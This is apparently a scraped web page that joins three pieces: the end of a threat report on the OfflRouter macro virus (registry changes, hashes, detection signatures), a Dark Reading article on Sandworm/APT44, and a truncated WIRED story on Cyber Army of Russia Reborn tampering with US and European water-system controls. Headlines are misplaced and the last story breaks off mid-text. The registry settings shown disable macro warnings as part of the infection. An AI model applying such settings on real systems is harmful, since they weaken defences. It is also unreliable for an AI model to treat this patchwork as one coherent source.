HKEY\_CURRENT\_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\AccessVBOM (to allow access to Visual Basic Object Model by the external applications) 
  
HKEY\_CURRENT\_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings (to disable warnings about potential Macro code in the infected documents) 
  
HKEY\_CURRENT\_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Options\\DefaultFormat (to set the default format to DOC) 

**Coverage **

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.  

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are  

The following ClamAV signatures detect malware artifacts related to this threat: 

Doc.Malware.Valyria-6714124-0 

Win.Virus.OfflRouter-10025942-0 

**IOCs **

IOCs for this research can also be found at our GitHub repository here. 

10e720fbcf797a2f40fbaa214b3402df14b7637404e5e91d7651bd13d28a69d8 - .NET module ctrlpanel.exe  

**Infected documents  **

2260989b5b723b0ccd1293e1ffcc7c0173c171963dfc03e9f6cd2649da8d0d2c 

2b0927de637d11d957610dd9a60d11d46eaa3f15770fb474067fb86d93a41912 

802342de0448d5c3b3aa6256e1650240ea53c77f8f762968c1abd8c967f9efd0 

016d90f337bd55dfcfbba8465a50e2261f0369cd448b4f020215f952a2a06bce 

**Mutex **

ctrlpanelapppppp

OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal

But even with that focus, the sophisticated threat group has continued operations against targets globally, including the US, says Google's Mandiant.

Source: Militarist via Shutterstock

The formidable Sandworm hacker group has played a central role supporting Russian military objectives in Ukraine over the past two years even as it has stepped up cyberthreat operations in other regions of strategic political, economic, and military interest to Russia.

That's the upshot of the analysis of the threat actor's activities undertaken by Google Cloud's Mandiant security group. They found that Sandworm — or APT44, as Mandiant has been tracking it — to be responsible for nearly all disruptive and destructive cyberattacks in Ukraine since Russia's invasion in February 2022.

In the process, the threat actor established itself as the primary cyberattack unit within Russia's Main Intelligence Directorate (GRU) and among all Russian state-backed cybergroups, Mandiant assessed. No other cyber outfit appears as totally integrated with Russia's military operators as Sandworm is presently, the security vendor noted in a report this week that offers a detailed look at the group's tools, techniques, and practices.

"APT44 operations are global in scope and mirror Russia's wide ranging national interests and ambitions," Mandiant warned. "Even with an ongoing war, we have observed the group sustain access and espionage operations across North America, Europe, the Middle East, Central Asia, and Latin America."

One manifestation of Sandworm's broadening global mandate was a series of attacks on three water and hydroelectric facilities in the US and France earlier this year by a hacking outfit called CyberArmyofRussia\_Reborn, which Mandiant believes is controlled by Sandworm.

The attacks — which appear to have been more a demonstration of capabilities than anything else — caused a system malfunction at one of the attacked US water facilities. In October 2022, a group that Mandiant believes was APT44 deployed ransomware against logistics providers in Poland in a rare instance of deploying a disruptive capability against a NATO country.

**Global Mandate**

Sandworm is a threat actor that has been active for more than a decade. It's well known for numerous high-profile attacks such as the one in 2022 that took down sections of Ukraine's power grid just prior to a Russian missile strike; the 2017 NotPetya ransomware outbreak, and an attack at the opening ceremony of the Pyeongchang Olympic Games in South Korea. The group has traditionally targeted government and critical infrastructure organizations, including those in the defense, transportation, and energy sectors. The US government and others have attributed the operation to a cyber unit within Russia's GRU. In 2020, the US Justice Department indicted several Russian military officers for their alleged role in various Sandworm campaigns.

"APT44 has an extremely broad targeting remit," says Dan Black, principal analyst at Mandiant. "Organizations who develop software or other technologies for industrial control systems and other critical infrastructure components should have APT44 front and center in their threat models."

Gabby Roncone, a senior analyst with Mandiant's Advanced Practices team, includes media organizations among APT44/Sandworm's targets, especially during elections. "Many key elections of high interest to Russia are taking place this year, and APT44 may attempt to be a key player" in them, Roncone says.

Mandiant itself has been tracking APT44 as a unit within Russia's military intelligence. "We track a complex external ecosystem that enables their operations, including state-owned research entities and private companies," Roncone adds.

Within Ukraine, Sandworm's attacks have increasingly focused on espionage activity with a view to gathering information for Russian military forces' battlefield advantage, Mandiant said. In many cases, the threat actor's favorite tactic for gaining initial access to target networks has been through exploitation of routers, VPNs, and other edge infrastructure. It's a tactic that the threat actor has been increasingly using since Russia's Ukraine invasion. While the group has accumulated a vast collection of bespoke attack tools, it has often relied on legitimate tools and living-off-the-land techniques to evade detection.

**An Elusive Enemy**

"APT44 is adept at flying under the detection radar. Building detections for commonly abused open source tools and living-off-the-land methods is critical," Black says.

Roncone also advocates that organizations map and maintain their network environments and segment networks where possible because of Sandworm's penchant for targeting vulnerable edge infrastructure for initial entry and re-entry into environments. "Organizations should additionally be wary of APT44 pivoting between espionage and disruptive goals after gaining access to networks," Roncone notes. "For folks working in media and media organizations in particular, digital safety training for individual journalists is key."

Black and Roncone perceive APT44/Sandworm's use of hacking fronts like CyberArmyofRussia\_Reborn as an attempt to draw attention to its campaigns and for deniability purposes.

"We have seen APT44 repeatedly use the CyberArmyofRussia\_Reborn Telegram to post evidence from and draw attention to its sabotage activity," Black says. "We cannot conclusively determine if this is an exclusive relationship but judge that APT44 has the ability to direct and influence what the persona posts on Telegram."

Black says APT44 could be using personas such as CyberArmyofRussia\_Reborn as a way to avoid direct attribution in case they cross a line or provoke a response. "But the second \[motive\] is that they create a fake sense of popular support for Russia's war — a false impression that average Russians are self-assembling to join the cyber fight against Ukraine."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

'Sandworm' Group Is Russia's Primary Cyberattack Unit in Ukraine

Cyber Army of Russia Reborn, a group with ties to the Kremlin’s Sandworm unit, is crossing lines even that notorious cyberwarfare unit wouldn’t dare to.

Russia's military intelligence unit known as Sandworm has, for the past decade, served as the Kremlin’s most aggressive cyberattack force, triggering blackouts in Ukraine and releasing self-spreading, destructive code in incidents that remain some of the most disruptive hacking events in history. In recent months, however, one group of hackers linked to Sandworm has attempted a kind of digital mayhem that, in some respects, goes beyond even its predecessor: They've claimed responsibility for directly targeting the digital systems of a hydroelectric dam in France and water utilities in the United States and Poland, flipping switches and changing software settings in an apparent effort to sabotage those countries’ critical infrastructure.

Since the beginning of this year, a hacktivist group known as the Cyber Army of Russia, or sometimes Cyber Army of Russia Reborn, has taken credit on at least three occasions for hacking operations that targeted US and European water and hydroelectric utilities. In each case, the hackers have posted videos to the social media platform Telegram that show screen recordings of their chaotic manipulation of so-called human-machine interfaces, software that controls physical equipment inside those target networks. The apparent victims of that hacking include multiple US water utilities in Texas, one Polish wastewater treatment plant, and a French hydroelectric plant—though it’s not clear exactly how much disruption or damage the hackers may have managed against any of those facilities.

A new report published today by cybersecurity firm Mandiant draws a link between that hacker group and Sandworm, which has been identified for years as Unit 74455 of Russia’s GRU military intelligence agency. Mandiant found evidence that Sandworm helped create Cyber Army of Russia Reborn and tracked multiple instances when data stolen from networks that Sandworm had attacked was later leaked by the Cyber Army of Russia Reborn group. Mandiant couldn't determine, however, whether Cyber Army of Russia Reborn is merely one of the many cover personas that Sandworm has adopted to disguise its activities over the last decade or instead a distinct group that Sandworm helped to create and collaborated with but which is now operating independently.

Either way, Cyber Army of Russia Reborn’s hacking has now, in some respects, become even more brazen than Sandworm itself, says John Hultquist, who leads Mandiant’s threat-intelligence efforts and has tracked Sandworm’s hackers for nearly a decade. He points out that Sandworm has never directly targeted a US network with a disruptive cyberattack—only planted malware on US networks in preparation for one or, in the case of its 2017 NotPetya ransomware attack, infected US victims indirectly with self-spreading code. Cyber Army of Russia Reborn, by contrast, hasn’t hesitated to cross that line.

“Even though this group is operating under this persona that’s tied to Sandworm, they do seem more reckless than any Russian operator we’ve ever seen targeting the United States,” Hultquist says. “They’re actively manipulating operational technology systems in a way that’s highly aggressive, probably disruptive, and dangerous.”

**An Overflowed Tank and a French Rooster**

Mandiant didn't have access to the targeted water utility and hydroelectric plant networks, so wasn't able to determine how Cyber Army of Russian Reborn got access to those networks. One of the group’s videos posted in mid-January, however, shows what appears to be a screen recording that captures the hackers’ manipulation of software interfaces for the control systems of water utilities in the Texas towns of Abernathy and Muleshoe. “We are starting our next raid across the USA,” reads a message introducing the video on Telegram. “In this video there are a couple of critical infrastructure objects, namely water supply systems😋”

A screen recording shows Cyber Army of Russian Reborn clicking buttons on the interface of a water utility in Texas.

Cyber Army of Russia Reborn via Telegram

The video then shows the hackers frenetically clicking around the target interface, changing values and settings for both utilities’ control systems. Though it’s not clear what effects that manipulation may have had, the Texas newspaper _The Plainview Herald_ reported in early February that local officials had acknowledged the cyberattacks and confirmed some level of disruption. The city manager for Muleshoe, Ramon Sanchez, reportedly said in a public meeting that the attack on the town’s utility had resulted in one water tank overflowing. Officials for the nearby towns of Abernathy and Hale Center—a target not mentioned in the hackers’ video—also said they’d been hit. All three towns’ utilities, as well as another, in Lockney, reportedly disabled their software to prevent its exploitation, but officials said that service to the water utilities’ customers was never interrupted. (WIRED reached out to officials from Muleshoe and Abernathy but didn't immediately hear back.)

Another screen recording shows Cyber Army of Russian Reborn tampering with the control systems of a Polish wastewater treatment plant, seemingly changing settings at radom.

Cyber Army of Russia Reborn via Telegram

Another video the Cyber Army of Russia Reborn hackers posted in January shows what appears to be a screen recording of a similar attempted sabotage of a wastewater utility in Wydminy, a village in Poland, a country whose government has been a staunch supporter of Ukraine in the midst of Russia’s invasion. “Hi everybody, today we will play with the Polish wastewater treatment plants. Enjoy watching!” says an automated Russian voice at the beginning of the video. The video then shows the hackers flipping switches and changing values in the software, set to a Super Mario Bros. soundtrack.

A third screen recording shows Cyber Army of Russia Reborn's access to a French water utility.

Cyber Army of Russia Reborn via Telegram

In a third video, published in March, the hackers similarly record themselves tampering with the control system for what they describe as the Courlon Sur Yonne hydroelectric dam in France. That video was posted just after French president Emmanuel Macron had made public statements suggesting he would send French military personnel to Ukraine to aid in its war against Russia. The video starts by showing Macron in the form of a rooster holding a French flag. “We recently heard a French rooster crowing,” the video says. “Today we’ll take a look at the Courlon dam and have a little fun. Enjoy watching, friends. Glory to Russia!”

In their Telegram post, the hackers claim to have lowered the French dam’s water level and stopped the flow of electricity it produced, though WIRED couldn’t confirm those claims. Neither the Wydminy facility nor the owner of the Courlon dam, Energies France, responded to WIRED’s request for comment.

In the videos, the hackers do display some knowledge of how a water utility works, as well as some ignorance and random switch-flipping, says Gus Serino, the founder of cybersecurity firm I&C Secure and a former staffer at a water utility and at the infrastructure cybersecurity firm Dragos. Serino notes that the hackers did, for instance, change the “stop level” for water tanks in the Texas utilities, which could have triggered the overflow that officials mentioned. But he notes that they also made other seemingly arbitrary changes, particularly for the Wydminy wastewater plant, that would have had no effect.

Tag

#git